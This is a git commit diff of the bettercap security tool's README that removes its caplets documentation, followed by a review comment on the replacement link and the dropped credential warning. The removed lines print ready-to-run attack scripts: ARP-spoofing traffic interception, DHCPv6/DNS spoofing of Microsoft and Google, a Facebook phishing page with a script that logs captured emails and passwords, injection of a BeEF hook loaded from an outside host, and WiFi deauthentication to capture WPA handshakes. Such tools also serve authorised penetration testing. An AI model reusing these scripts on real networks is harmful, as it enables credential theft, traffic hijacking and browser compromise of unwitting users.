misc: small fix or general refactoring I did not bother commenting

evilsocket 2018-02-23 00:26:19 +01:00
commit 6b178afc4d

250
README.md

@ -122,255 +122,7 @@ And finally, you can access and use any variable that has been declared in the i
## Caplets
Interactive sessions can be scripted with `.cap` files, or `caplets`, the following are a few basic examples, look the `caplets` folder for more.
#### caplets/http-req-dump.cap
Execute an ARP spoofing attack on the whole network (by default) or on a host (using `-eval` as described), intercept HTTP and HTTPS requests with the `http.proxy` and `https.proxy` modules and dump them using the `http-req-dumsp.js` proxy script.
```sh
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet caplets/http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"
# to make it less verbose
# events.stream off
# discover a few hosts
net.probe on
sleep 1
net.probe off
# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on
# we'll use this proxy script to dump requests
set https.proxy.script caplets/http-req-dump.js
set http.proxy.script caplets/http-req-dump.js
clear
# go ^_^
http.proxy on
https.proxy on
arp.spoof on
```
#### caplets/netmon.cap
An example of how to use the `ticker` module, use this caplet to monitor activities on your network.
```sh
net.probe on
clear
ticker on
```
#### caplets/mitm6.cap
[Reroute IPv4 DNS requests by using DHCPv6 replies](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/), start a HTTP server and DNS spoofer for `microsoft.com` and `google.com`.
```sh
# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com
# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www
# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on
# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear
```
<center>
<img src="https://pbs.twimg.com/media/DTXrMJJXcAE-NcQ.jpg:large" width="100%"/>
</center>
#### caplets/rest-api.cap
Start a rest API.
```sh
# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082
# actively probe network for new hosts
net.probe on
# enjoy /api/session and /api/events
api.rest on
```
Get information about the current session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session
Execute a command in the current interactive session:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'
Get last 50 events:
curl -k --user bcap:bcap https://bettercap-ip:8083/api/events?n=50
Clear events:
curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events
<center>
<img src="https://pbs.twimg.com/media/DTAreSCX4AAXX6v.jpg:large" width="100%"/>
</center>
#### caplets/fb-phish.cap
This caplet will create a fake Facebook login page on port 80, intercept login attempts using the `http.proxy`, print credentials and redirect the target to the real Facebook.
<center>
<img src="https://pbs.twimg.com/media/DTY39bnXcAAg5jX.jpg:large" width="100%"/>
</center>
Make sure to create the folder first:
$ cd caplets/www/
$ make
```sh
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/
set http.proxy.script caplets/fb-phish.js
http.proxy on
http.server on
```
The `caplets/fb-phish.js` proxy script file:
```javascript
function onRequest(req, res) {
if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) {
var form = req.ParseForm();
var email = form["email"] || "?",
pass = form["pass"] || "?";
log( R(req.Client), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" );
res.Status = 301;
res.Headers = "Location: https://www.facebook.com/\n" +
"Connection: close";
}
}
```
#### caplets/beef-inject.cap
Use a proxy script to inject a BEEF javascript hook:
```sh
# targeting the whole subnet by default, to make it selective:
#
# sudo ./bettercap -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"
# inject beef hook
set http.proxy.script caplets/beef-inject.js
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
```
The `caplets/beef.inject.js` proxy script file:
```javascript
function onLoad() {
console.log( "BeefInject loaded." );
console.log("targets: " + env['arp.spoof.targets']);
}
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>'
);
}
}
}
```
#### caplets/airmon.cap
Put a wifi interface in monitor mode and listen for frames in order to detect WiF access points and clients.
```
set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
set ticker.commands clear; wifi.show
# uncomment to disable channel hopping
# set wifi.recon.channel 1
wifi.recon on
ticker on
events.clear
clear
```
#### caplets/wpa\_handshake.cap
Use various modules to inject wifi frames performing a deauthentication attack, while a sniffer is waiting for WPA handshakes.
```
# swag prompt for wifi
set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
# Sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
set net.sniff.verbose true
set net.sniff.filter ether proto 0x888e
set net.sniff.output wpa.pcap
net.sniff on
# since we need to capture the handshake, we can't hop
# through channels but we need to stick to the one we're
# interested in otherwise the sniffer might lose packets.
set wifi.recon.channel 1
wifi.recon on
# uncomment to recon clients of a specific AP given its BSSID
# wifi.recon DE:AD:BE:EF:DE:AD
events.clear
clear
# now just deauth clients and wait ^_^
#
# Example:
#
# wifi.deauth AP-BSSID-HERE
#
# This will deauth every client for this specific access point,
# you can put it as ticker.commands to have the ticker module
# periodically deauth clients :D
```
Caplets, or `.cap` files are a powerful way to script bettercap's interactive sessions, think about them as the `.rc` files of Metasploit. You will find updated caplets and modules [in this repository](/bettercap/caplets), you're strongly invited to check it out in order to fully understand the features of this tool.
## License
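Review bot: the single line this hunk keeps in place of the caplets section (`Caplets, or `.cap` files are a powerful way ...`, just above `## License`) links to the caplets project as `[in this repository](/bettercap/caplets)`, a site-root-relative path that only resolves when the README is rendered on github.com and breaks in a clone, a mirror or a package index page; use the absolute repository URL, and add the missing comma so it reads `Caplets, or `.cap` files, are`. The removed lines were the only in-tree documentation of the proxy-script hooks (`onLoad`, `onRequest`, `onResponse`, `req.ParseForm()`, `res.ReadBody()`, `res.Headers`), of the REST API endpoints (`/api/session`, `/api/events`, the `?n=50` and `DELETE` forms) and of the `# change these!` warning next to the `bcap`/`bcap` default `api.rest` credentials; before landing, confirm the caplets repository carries that material, otherwise the README stops telling users to replace those credentials before exposing the API. The commit message (`misc: small fix or general refactoring ...`) should also state that the caplets section was moved out, since a 250-line documentation removal is not a small fix.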